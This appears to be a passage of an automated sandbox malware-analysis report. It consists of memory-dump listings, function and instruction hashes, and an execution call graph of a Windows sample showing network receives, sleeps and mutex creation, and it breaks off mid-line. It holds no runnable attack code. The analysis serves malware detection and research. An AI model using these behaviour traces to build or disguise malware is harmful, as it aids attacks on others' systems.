                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760201887.00000000011D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760256251.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760270146.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760289447.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760304906.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760320318.0000000001231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760344086.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760362786.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760377727.0000000001243000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: bZ+,$list too long
                                                                                                                                                                                                                                                  • API String ID: 0-3847659041
                                                                                                                                                                                                                                                  • Opcode ID: f638f83619546bb18c99a363ba6b1dbadb70c8d4ab7e626599bcf1b528c9c961
                                                                                                                                                                                                                                                  • Instruction ID: cc9eb3e2569ccd10d87c576b40f9a0953c6545d90a74ae9d6c4ecaf75cf89869
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f638f83619546bb18c99a363ba6b1dbadb70c8d4ab7e626599bcf1b528c9c961
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C61C4B0D04218ABDB20DF64CC45B99F7B4FF05720F0451AAE80DA7381E7B5AA45DF92
                                                                                                                                                                                                                                                  Function 00F32900 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 94COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00F329DF
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759443355.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759458259.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759511763.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759525849.0000000000F9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759541568.0000000000FA7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759637832.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759654928.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759671379.0000000001119000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759685576.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759727179.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759741488.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759754002.000000000112E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759766363.000000000112F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759781070.000000000113A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759793764.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759809937.0000000001157000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759824065.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759835941.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759848218.000000000116A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759867855.0000000001185000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759880340.0000000001186000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759893441.000000000118E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759911534.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759999410.0000000001190000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760012717.0000000001195000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760026729.0000000001196000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760042541.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760057398.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760072076.00000000011A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760085770.00000000011A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760100453.00000000011B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760114641.00000000011B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760128206.00000000011B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760141516.00000000011BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760155031.00000000011C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760172883.00000000011D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760187702.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760201887.00000000011D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760256251.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760270146.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760289447.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760304906.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760320318.0000000001231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760344086.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760362786.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760377727.0000000001243000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ___std_exception_copy
                                                                                                                                                                                                                                                  • String ID: bZ+,$bZ+,
                                                                                                                                                                                                                                                  • API String ID: 2659868963-1833137673
                                                                                                                                                                                                                                                  • Opcode ID: 34b432bcee629bd77f5a5a7dc235ca15711f628621090cec60aec20bd9cabbfb
                                                                                                                                                                                                                                                  • Instruction ID: e21319e7060531014a94bb6feae68fe67d62c64053cfea625994f00e5dc47021
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 34b432bcee629bd77f5a5a7dc235ca15711f628621090cec60aec20bd9cabbfb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D631C071A10208ABCB04EF58CC40B8EFBB8EF49720F54821AF814A7740EB74A9549BA0
                                                                                                                                                                                                                                                  Function 00F32B30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00F32B63
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • This function cannot be called on a default constructed task, xrefs: 00F32B43
                                                                                                                                                                                                                                                  • bZ+,, xrefs: 00F32B36
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759443355.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759458259.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759511763.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759525849.0000000000F9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759541568.0000000000FA7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759637832.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759654928.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759671379.0000000001119000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759685576.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759727179.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759741488.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759754002.000000000112E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759766363.000000000112F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759781070.000000000113A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759793764.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759809937.0000000001157000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759824065.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759835941.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759848218.000000000116A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759867855.0000000001185000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759880340.0000000001186000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759893441.000000000118E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759911534.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759999410.0000000001190000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760012717.0000000001195000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760026729.0000000001196000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760042541.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760057398.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760072076.00000000011A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760085770.00000000011A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760100453.00000000011B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760114641.00000000011B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760128206.00000000011B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760141516.00000000011BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760155031.00000000011C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760172883.00000000011D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760187702.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760201887.00000000011D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760256251.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760270146.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760289447.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760304906.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760320318.0000000001231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760344086.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760362786.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760377727.0000000001243000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ___std_exception_copy
                                                                                                                                                                                                                                                  • String ID: This function cannot be called on a default constructed task$bZ+,
                                                                                                                                                                                                                                                  • API String ID: 2659868963-4108026560
                                                                                                                                                                                                                                                  • Opcode ID: 4a83120da99eb605c6536699096830a26cf8417a797d67e6ba2f109ad64705ae
                                                                                                                                                                                                                                                  • Instruction ID: 5c3f46110f6fdb342cef97b5c66df44cfdc2ba98b19a499e04cf331fdfab7032
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4a83120da99eb605c6536699096830a26cf8417a797d67e6ba2f109ad64705ae
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2F08271D1120C9BC710EF689C415DEBBE9AF15300B5042AEE84067201EB741A589BA5

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:0.9%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                                  Total number of Nodes:606
                                                                                                                                                                                                                                                  Total number of Limit Nodes:4
                                                                                                                                                                                                                                                  execution_graph 10127 93c8e 10128 93c98 10127->10128 10129 92410 4 API calls 10128->10129 10130 93ca5 10128->10130 10129->10130 10131 93810 3 API calls 10130->10131 10132 93ccf 10131->10132 10133 93810 3 API calls 10132->10133 10134 93cdb shared_ptr 10133->10134 9698 c6a44 9699 c6a5c 9698->9699 9700 c6a52 9698->9700 9703 c698d 9699->9703 9702 c6a76 __freea 9706 c690a 9703->9706 9705 c699f 9705->9702 9707 c692a 9706->9707 9708 c6921 9706->9708 9707->9708 9714 ca671 9707->9714 9708->9705 9718 ca67b __dosmaperr __freea 9714->9718 9715 c694a 9719 cb5fb 9715->9719 9718->9715 9727 c8bec 9718->9727 9720 cb60e 9719->9720 9721 c6960 9719->9721 9720->9721 9753 cf5ab 9720->9753 9723 cb628 9721->9723 9724 cb63b 9723->9724 9725 cb650 9723->9725 9724->9725 9760 ce6b1 9724->9760 9725->9708 9728 c8bf1 __cftof 9727->9728 9732 c8bfc __cftof 9728->9732 9733 cd634 9728->9733 9747 c65ed 9732->9747 9735 cd640 __cftof __dosmaperr 9733->9735 9734 cd69c __dosmaperr ___std_exception_copy 9734->9732 9735->9734 9736 cd81b __cftof 9735->9736 9737 cd726 9735->9737 9738 cd751 __cftof 9735->9738 9739 c65ed __cftof 3 API calls 9736->9739 9737->9738 9750 cd62b 9737->9750 9738->9734 9742 ca671 __cftof 3 API calls 9738->9742 9745 cd7a5 9738->9745 9741 cd82e 9739->9741 9742->9745 9744 cd62b __cftof 3 API calls 9744->9738 9745->9734 9746 ca671 __cftof 3 API calls 9745->9746 9746->9734 9748 c64c7 __cftof 3 API calls 9747->9748 9749 c65fe 9748->9749 9751 ca671 __cftof 3 API calls 9750->9751 9752 cd630 9751->9752 9752->9744 9754 cf5b7 __dosmaperr 9753->9754 9755 ca671 __cftof 3 API calls 9754->9755 9756 cf5c0 __cftof __dosmaperr 9755->9756 9757 cf606 9756->9757 9758 c8bec __cftof 3 API calls 9756->9758 9757->9721 9759 cf62b 9758->9759 9761 ca671 __cftof 3 API calls 9760->9761 9762 ce6bb 9761->9762 9765 ce5c9 9762->9765 9764 ce6c1 9764->9725 9766 ce5d5 __cftof __dosmaperr __freea 9765->9766 9767 ce5f6 9766->9767 9768 c8bec __cftof 3 API calls 9766->9768 9767->9764 9770 ce668 9768->9770 9769 ce6a4 9769->9764 9770->9769 9774 ca72e 9770->9774 9778 ca739 __dosmaperr __freea 9774->9778 9775 c8bec __cftof 3 API calls 9776 ca7c7 9775->9776 9777 ca7be 9779 ce4b0 9777->9779 9778->9775 9778->9777 9780 ce5c9 __cftof 3 API calls 9779->9780 9781 ce4c3 9780->9781 9786 ce259 9781->9786 9783 ce4cb __cftof 9785 ce4dc __cftof __dosmaperr __freea 9783->9785 9789 ce6c4 9783->9789 9785->9769 9787 c690a __cftof 3 API calls 9786->9787 9788 ce26b 9787->9788 9788->9783 9790 ce259 __cftof 3 API calls 9789->9790 9793 ce6e4 __cftof 9790->9793 9791 ce75a __cftof std::invalid_argument::invalid_argument 9791->9785 9793->9791 9794 ce32f 9793->9794 9795 ce420 std::invalid_argument::invalid_argument 9794->9795 9796 ce357 9794->9796 9795->9791 9796->9795 9802 cf1bf 9796->9802 9798 ce3d7 9805 d4dfe 9798->9805 9800 ce3f8 9801 d4dfe __cftof 3 API calls 9800->9801 9801->9795 9803 c690a __cftof 3 API calls 9802->9803 9804 cf1df __cftof __freea std::invalid_argument::invalid_argument 9803->9804 9804->9798 9806 c690a __cftof 3 API calls 9805->9806 9807 d4e11 __cftof 9806->9807 9807->9800 9671 92e00 9672 92e28 9671->9672 9675 ac68b 9672->9675 9678 ac3d5 9675->9678 9677 92e33 9679 ac3eb 9678->9679 9680 ac3e1 9678->9680 9679->9677 9681 ac39e 9680->9681 9682 ac3be 9680->9682 9681->9679 9687 accd5 9681->9687 9691 acd0a 9682->9691 9685 ac3d0 9685->9677 9688 ac3b7 9687->9688 9689 acce3 InitializeCriticalSectionEx 9687->9689 9688->9677 9689->9688 9692 acd1f RtlInitializeConditionVariable 9691->9692 9692->9685 10197 9e0c0 recv 10198 9e122 recv 10197->10198 10199 9e157 recv 10198->10199 10201 9e191 10199->10201 10200 9e2b3 std::invalid_argument::invalid_argument 10201->10200 10202 ac6ac GetSystemTimePreciseAsFileTime 10201->10202 10203 9e2ee 10202->10203 10204 ac26a 4 API calls 10203->10204 10205 9e358 10204->10205 10206 92ec0 10207 92f06 10206->10207 10211 92f6f 10206->10211 10208 ac6ac GetSystemTimePreciseAsFileTime 10207->10208 10209 92f12 10208->10209 10210 9301e 10209->10210 10216 92f1d __Mtx_unlock 10209->10216 10213 ac26a 4 API calls 10210->10213 10212 92fef 10211->10212 10217 ac6ac GetSystemTimePreciseAsFileTime 10211->10217 10214 93024 10213->10214 10215 ac26a 4 API calls 10214->10215 10218 92fb9 10215->10218 10216->10211 10216->10214 10217->10218 10219 ac26a 4 API calls 10218->10219 10220 92fc0 __Mtx_unlock 10218->10220 10219->10220 10221 ac26a 4 API calls 10220->10221 10222 92fd8 10220->10222 10221->10222 10222->10212 10223 ac26a 4 API calls 10222->10223 10224 9303c 10223->10224 10225 ac6ac GetSystemTimePreciseAsFileTime 10224->10225 10234 93080 shared_ptr __Mtx_unlock 10225->10234 10226 ac26a 4 API calls 10227 931cb 10226->10227 10228 ac26a 4 API calls 10227->10228 10229 931d1 10228->10229 10230 ac26a 4 API calls 10229->10230 10236 93193 __Mtx_unlock 10230->10236 10231 931a7 std::invalid_argument::invalid_argument 10232 ac26a 4 API calls 10233 931dd 10232->10233 10234->10227 10234->10231 10235 ac6ac GetSystemTimePreciseAsFileTime 10234->10235 10237 9315f 10234->10237 10235->10237 10236->10231 10236->10232 10237->10226 10237->10229 10237->10236 10381 98980 10383 98aea 10381->10383 10384 989d8 shared_ptr 10381->10384 10382 95c10 3 API calls 10382->10384 10384->10382 10384->10383 10238 ad0c7 10239 ad0d6 10238->10239 10240 ad17f 10239->10240 10241 ad17b RtlWakeAllConditionVariable 10239->10241 10342 99f44 10344 99f4c shared_ptr 10342->10344 10343 9a953 Sleep CreateMutexA 10346 9a98e 10343->10346 10344->10343 10345 9a01f shared_ptr 10344->10345 9808 93c47 9809 93c51 9808->9809 9812 93c5f 9809->9812 9815 932d0 9809->9815 9810 93c68 9812->9810 9832 93810 9812->9832 9836 ac6ac 9815->9836 9818 9333c __Mtx_unlock 9820 ac26a 4 API calls 9818->9820 9822 93350 std::invalid_argument::invalid_argument 9818->9822 9819 93314 9819->9818 9839 ac26a 9819->9839 9821 93377 9820->9821 9823 ac6ac GetSystemTimePreciseAsFileTime 9821->9823 9822->9812 9824 933af 9823->9824 9825 ac26a 4 API calls 9824->9825 9826 933b6 9824->9826 9825->9826 9827 ac26a 4 API calls 9826->9827 9828 933d7 __Mtx_unlock 9826->9828 9827->9828 9829 ac26a 4 API calls 9828->9829 9830 933eb 9828->9830 9831 9340e 9829->9831 9830->9812 9831->9812 9833 9381c 9832->9833 9877 92440 9833->9877 9843 ac452 9836->9843 9838 ac6b9 9838->9819 9840 ac292 9839->9840 9841 ac274 9839->9841 9840->9840 9841->9840 9860 ac297 9841->9860 9844 ac4a8 9843->9844 9846 ac47a std::invalid_argument::invalid_argument 9843->9846 9844->9846 9849 acf6b 9844->9849 9846->9838 9847 ac4fd __Xtime_diff_to_millis2 9847->9846 9848 acf6b _xtime_get GetSystemTimePreciseAsFileTime 9847->9848 9848->9847 9850 acf7a 9849->9850 9852 acf87 __aulldvrm 9849->9852 9850->9852 9853 acf44 9850->9853 9852->9847 9856 acbea 9853->9856 9857 acbfb GetSystemTimePreciseAsFileTime 9856->9857 9859 acc07 9856->9859 9857->9859 9859->9852 9863 92ae0 9860->9863 9862 ac2ae std::_Throw_future_error 9870 abedf 9863->9870 9865 92af4 __dosmaperr 9865->9862 9866 ca671 __cftof 3 API calls 9865->9866 9867 c6ccc 9866->9867 9868 c8bec __cftof 3 API calls 9867->9868 9869 c6cf6 9868->9869 9873 acc31 9870->9873 9874 acc3f InitOnceExecuteOnce 9873->9874 9876 abef2 9873->9876 9874->9876 9876->9865 9880 ab5d6 9877->9880 9879 92472 9882 ab5f1 std::_Throw_future_error 9880->9882 9881 c8bec __cftof 3 API calls 9883 ab69f 9881->9883 9882->9881 9884 ab658 __cftof std::invalid_argument::invalid_argument 9882->9884 9884->9879 10347 9215a 10350 ac6fc 10347->10350 10349 92164 10351 ac70c 10350->10351 10352 ac724 10350->10352 10351->10352 10354 acfbe 10351->10354 10352->10349 10355 accd5 __Mtx_init_in_situ InitializeCriticalSectionEx 10354->10355 10356 acfd0 10355->10356 10356->10351 10242 99adc 10243 99aea 10242->10243 10247 99afe shared_ptr 10242->10247 10244 9a917 10243->10244 10243->10247 10245 9a953 Sleep CreateMutexA 10244->10245 10246 9a98e 10245->10246 10248 95c10 3 API calls 10247->10248 10249 99b7c 10248->10249 10250 98b30 3 API calls 10249->10250 10251 99b8d 10250->10251 10252 95c10 3 API calls 10251->10252 10253 99cb1 10252->10253 10254 98b30 3 API calls 10253->10254 10255 99cc2 10254->10255 10385 93f9f 10386 93fad 10385->10386 10387 93fb6 10385->10387 10388 92410 4 API calls 10386->10388 10388->10387 10260 92b10 10261 92b1a 10260->10261 10262 92b1c 10260->10262 10263 ac26a 4 API calls 10262->10263 10264 92b22 10263->10264 10389 92b90 10390 92bce 10389->10390 10391 ab7fb TpReleaseWork 10390->10391 10392 92bdb shared_ptr std::invalid_argument::invalid_argument 10391->10392 10265 ad111 10266 ad122 10265->10266 10267 ad12a 10266->10267 10269 ad199 10266->10269 10270 ad1a7 SleepConditionVariableCS 10269->10270 10272 ad1c0 10269->10272 10270->10272 10272->10266 9666 9a856 9667 9a892 shared_ptr 9666->9667 9668 9a870 9666->9668 9668->9667 9669 9a953 Sleep CreateMutexA 9668->9669 9670 9a98e 9669->9670 10140 95cad 10142 95caf __cftof 10140->10142 10141 95d17 shared_ptr std::invalid_argument::invalid_argument 10142->10141 10143 95c10 3 API calls 10142->10143 10144 966ac 10143->10144 10145 95c10 3 API calls 10144->10145 10146 966b1 10145->10146 10147 922c0 3 API calls 10146->10147 10148 966c9 shared_ptr 10147->10148 10149 95c10 3 API calls 10148->10149 10150 9673d 10149->10150 10151 922c0 3 API 